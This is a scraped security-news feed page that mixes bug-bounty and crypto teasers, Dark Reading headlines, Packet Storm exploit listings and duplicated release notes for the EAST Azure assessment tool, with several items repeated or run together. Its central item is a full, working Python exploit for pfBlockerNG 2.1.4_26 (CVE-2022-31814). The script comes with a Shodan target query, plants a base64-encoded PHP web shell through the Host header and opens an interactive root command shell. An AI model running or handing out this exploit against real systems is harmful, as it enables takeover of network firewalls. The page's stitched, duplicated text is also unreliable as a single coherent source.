Google, one of the world’s leading tech giants, has recently disclosed the results of its bug bounty campaign, which rewards ethical…Continue reading on Medium » (https://medium.com/@raphaelcarlosr/google-rewards-ethical-hackers-with-over-12-million-in-bug-bounties-7d7a0e16042f?source=rss------bug_bounty-5)
Testnet Nodes in Cryptocurrency: Opportunities for Earning Money
https://medium.com/@kibagusranggajati/testnet-nodes-in-cryptocurrency-opportunities-for-earning-money-51ddfe99f2c3?source=rss------bug_bounty-5
https://medium.com/@kibagusranggajati/testnet-nodes-in-cryptocurrency-opportunities-for-earning-money-51ddfe99f2c3?source=rss------bug_bounty-5
Cryptocurrency testnet nodes are essentially replicas of the main blockchain network that developers use to test and experiment with new…Continue reading on Medium » (https://medium.com/@kibagusranggajati/testnet-nodes-in-cryptocurrency-opportunities-for-earning-money-51ddfe99f2c3?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Edgio Strengthens Security Offering With WAAP Enhancements and DDoS Scrubbing Solution
Upgrades boost Edgio's ability to mitigate sophisticated threats and safeguard applications and data.
Edgio Strengthens Security Offering With WAAP Enhancements and DDoS Scrubbing Solution
Upgrades boost Edgio's ability to mitigate sophisticated threats and safeguard applications and data.
Dark Reading: Attacks/Breaches
As Social Engineering Attacks Skyrocket, Evaluate Your Security Education Plan
Build a playbook for employees on how to handle suspicious communications, use mail filters, and screen and verify unfamiliar calls to bolster a defensive social engineering security strategy.
As Social Engineering Attacks Skyrocket, Evaluate Your Security Education Plan
Build a playbook for employees on how to handle suspicious communications, use mail filters, and screen and verify unfamiliar calls to bolster a defensive social engineering security strategy.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Arm Mali CSF kbase_kcpu_command_queue Use-After-Free
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
kbase_csf_kcpu_queue_enqueue() locks the kctx->csf.kcpu_queues, looks up a pointer from inside that structure, then drops the lock before continuing to use the kbase_kcpu_command_queue that was looked up. This is a classic use-after-free pattern, where the lookup of a pointer is protected but the protective lock is then released without first acquiring any other lock or reference to keep the referenced object alive.
SHA-256 |
Download
Source:packetstormsecurity.com
Arm Mali CSF kbase_kcpu_command_queue Use-After-Free
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
kbase_csf_kcpu_queue_enqueue() locks the kctx->csf.kcpu_queues, looks up a pointer from inside that structure, then drops the lock before continuing to use the kbase_kcpu_command_queue that was looked up. This is a classic use-after-free pattern, where the lookup of a pointer is protected but the protective lock is then released without first acquiring any other lock or reference to keep the referenced object alive.
SHA-256 |
4fd61c0109d183f3b2a909d608ec4f7ebeb118f98b4d057a01a280c10f5a5339Download
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
pfBlockerNG 2.1.4_26 Remote Code Execution
https://4.bp.blogspot.com/-sHG2jViTb-c/WWlvSCf2XfI/AAAAAAAAINY/YxfxwjOK_o05QB9TpuqqysTdHaIb3yf8wCLcBGAs/s1600/h36.png
pfBlockerNG version 2.1.4_26 remote code execution exploit.
SHA-256 |
Download
Source:packetstormsecurity.com
pfBlockerNG 2.1.4_26 Remote Code Execution
https://4.bp.blogspot.com/-sHG2jViTb-c/WWlvSCf2XfI/AAAAAAAAINY/YxfxwjOK_o05QB9TpuqqysTdHaIb3yf8wCLcBGAs/s1600/h36.png
pfBlockerNG version 2.1.4_26 remote code execution exploit.
SHA-256 |
4ac7bffe74c29e0dabbff18d552da8d3e73678fb8ed2b4a6a73be8d67499aebcDownload
# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser(description="pfBlockerNG <=
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
url = args.url
shell_filename = "system_advanced_control.php"
def check_endpoint(url):
response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
if response.status_code == 200:
print("[+] pfBlockerNG is installed")
else:
print("\n[-] pfBlockerNG not installed")
sys.exit()
def upload_shell(url, shell_filename):
payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
print("[/] Uploading shell...")
response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
time.sleep(2)
response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
print("[+] Upload succeeded")
else:
print("\n[-] Error uploading shell. Probably patched ", response.content)
sys.exit()
def interactive_shell(url, shell_filename, cmd):
response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
print(str(response.text)+"\n")
def delete_shell(url, shell_filename):
delcmd = "rm /usr/local/www/system_advanced_control.php"
response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
print("\n[+] Shell deleted")
check_endpoint(url)
upload_shell(url, shell_filename)
try:
while True:
cmd = input("# ")
interactive_shell(url, shell_filename, cmd)
except:
delete_shell(url, shell_filename)
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
EAST – Extensible Azure Security Tool – Documentation
Extensible Azure Security Tool (Later referred as E.A.S.T) is tool for assessing Azure and to some extent Azure AD security controls. Primary use case of EAST is Security data collection for evaluation in Azure Assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.
This tool is licensed under MIT license.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1Sco3kNs2NoRgTqdxFRrNYtXdeZ9hHYjSvsB741EgLEoAfwst8AehiVQUjbOosE3zHXShCXIeHa1fPLQ8D4XbvJ8l-bjeuclFQvaltN7sQJ7RpmTDCVFGY6qjMAEw2o6688g_BfL0D0FZvKE2WYDyFh-foaFXstWpvU6d-KOBC23ryvc0nkCq_8i/s16000/1.png https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7NcHs2g-EB002opNnJ0eyY2KcvRlDWEBfZayB-sN74PbMRkful8o3DeQguCee6RC5g4YMY_GCK3wYeh0SIjPiH0zumcL4_uPWC58FUzCZF_Luec0XfBKlU6oNz_DDaQsIW6e_XrslcKqvYOZlzLW70Hx_MLonuKhDWpCiy1WNOqSk6hJNFA34rOZ0/s16000/2.png Release notes* Preview branch introduced Changes:
* Installation now accounts for use of Azure Cloud Shell’s updated version in regards to depedencies (Cloud Shell has now Node.JS v 16 version installed)
* Checking of Databricks cluster types as per advisory
* Audits Databricks clusters for potential privilege elevation – This control requires typically permissions on the databricks cluster”
* Content.json is has now key and content based sorting. This enables doing delta checks with
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit9mIYUARvQ5gPpR4L0Hm3SAsXS3OepoCIvNGc1VW-qk_v1XIqXhu62X6VRrrD_zZfAxoqwHPy2CyHp3cReK30mHPpFxvZyKvd3cysFQ1h5Kwx872KUDDagy1aRI3gJ1RzX_NgdE-l7HrbloZRw4P9zs1vUvmXiSdMLHCBHxreOctfE6DC0tHGxZqy/s16000/3.png
https://s.w.org/images/core/emoji/14.0.0/72x72/26a0.png Word of caution, if want to check deltas of content.json, then content.json will need to be “unignored” from
Note: Use this feature with caution, and ensure you don’t have public upstream set for the branch you are using this feature for
Change of programming patterns to avoid possible race conditions with larger datasets. This is mostly changes of using
* Fixes, updates etc. are done on “Best effort” basis, with no guarantee of time, or quality of the possible fix applied
* We do some additional tuning before using EAST in our daily work, such as apply various run and environment restrictions, besides formalizing ourselves with the environment in question. Thus we currently recommend, that EAST is run in only in test environments, and with read-only permissions.
* All the calls in the service are largely to Azure Cloud IP’s, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could “phone home” without also having C2 in Azure.
* Essentially running it in read-only mode, reduces a lot of the risk associated with possibly compromised NPM packages (Google compromised NPM)
* Bugs etc: You can protect your environment against certain mistakes in this code by running the tool with reader-only permissions
* Lot of the code is “AS IS”: Meaning, it’s been serving only the purpose of creating certain result; Lot of cleaning up and modularizing remains to be finished
* There are no tests at the moment, apart from certain manual checks, that are run after changes to main.js and various more advanced controls.
* The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
* As [...]
EAST – Extensible Azure Security Tool – Documentation
Extensible Azure Security Tool (Later referred as E.A.S.T) is tool for assessing Azure and to some extent Azure AD security controls. Primary use case of EAST is Security data collection for evaluation in Azure Assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.
This tool is licensed under MIT license.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1Sco3kNs2NoRgTqdxFRrNYtXdeZ9hHYjSvsB741EgLEoAfwst8AehiVQUjbOosE3zHXShCXIeHa1fPLQ8D4XbvJ8l-bjeuclFQvaltN7sQJ7RpmTDCVFGY6qjMAEw2o6688g_BfL0D0FZvKE2WYDyFh-foaFXstWpvU6d-KOBC23ryvc0nkCq_8i/s16000/1.png https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7NcHs2g-EB002opNnJ0eyY2KcvRlDWEBfZayB-sN74PbMRkful8o3DeQguCee6RC5g4YMY_GCK3wYeh0SIjPiH0zumcL4_uPWC58FUzCZF_Luec0XfBKlU6oNz_DDaQsIW6e_XrslcKqvYOZlzLW70Hx_MLonuKhDWpCiy1WNOqSk6hJNFA34rOZ0/s16000/2.png Release notes* Preview branch introduced Changes:
* Installation now accounts for use of Azure Cloud Shell’s updated version in regards to depedencies (Cloud Shell has now Node.JS v 16 version installed)
* Checking of Databricks cluster types as per advisory
* Audits Databricks clusters for potential privilege elevation – This control requires typically permissions on the databricks cluster”
* Content.json is has now key and content based sorting. This enables doing delta checks with
git diff HEAD^1¹ as content.json has predetermined order of resultshttps://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit9mIYUARvQ5gPpR4L0Hm3SAsXS3OepoCIvNGc1VW-qk_v1XIqXhu62X6VRrrD_zZfAxoqwHPy2CyHp3cReK30mHPpFxvZyKvd3cysFQ1h5Kwx872KUDDagy1aRI3gJ1RzX_NgdE-l7HrbloZRw4P9zs1vUvmXiSdMLHCBHxreOctfE6DC0tHGxZqy/s16000/3.png
https://s.w.org/images/core/emoji/14.0.0/72x72/26a0.png Word of caution, if want to check deltas of content.json, then content.json will need to be “unignored” from
.gitignoreexposing results to any upstream you might have configured.Note: Use this feature with caution, and ensure you don’t have public upstream set for the branch you are using this feature for
Change of programming patterns to avoid possible race conditions with larger datasets. This is mostly changes of using
varto letin for await-style loops Importanthttps://s.w.org/images/core/emoji/14.0.0/72x72/26a0.png Current status of the tool is beta* Fixes, updates etc. are done on “Best effort” basis, with no guarantee of time, or quality of the possible fix applied
* We do some additional tuning before using EAST in our daily work, such as apply various run and environment restrictions, besides formalizing ourselves with the environment in question. Thus we currently recommend, that EAST is run in only in test environments, and with read-only permissions.
* All the calls in the service are largely to Azure Cloud IP’s, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could “phone home” without also having C2 in Azure.
* Essentially running it in read-only mode, reduces a lot of the risk associated with possibly compromised NPM packages (Google compromised NPM)
* Bugs etc: You can protect your environment against certain mistakes in this code by running the tool with reader-only permissions
* Lot of the code is “AS IS”: Meaning, it’s been serving only the purpose of creating certain result; Lot of cleaning up and modularizing remains to be finished
* There are no tests at the moment, apart from certain manual checks, that are run after changes to main.js and various more advanced controls.
* The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
* As [...]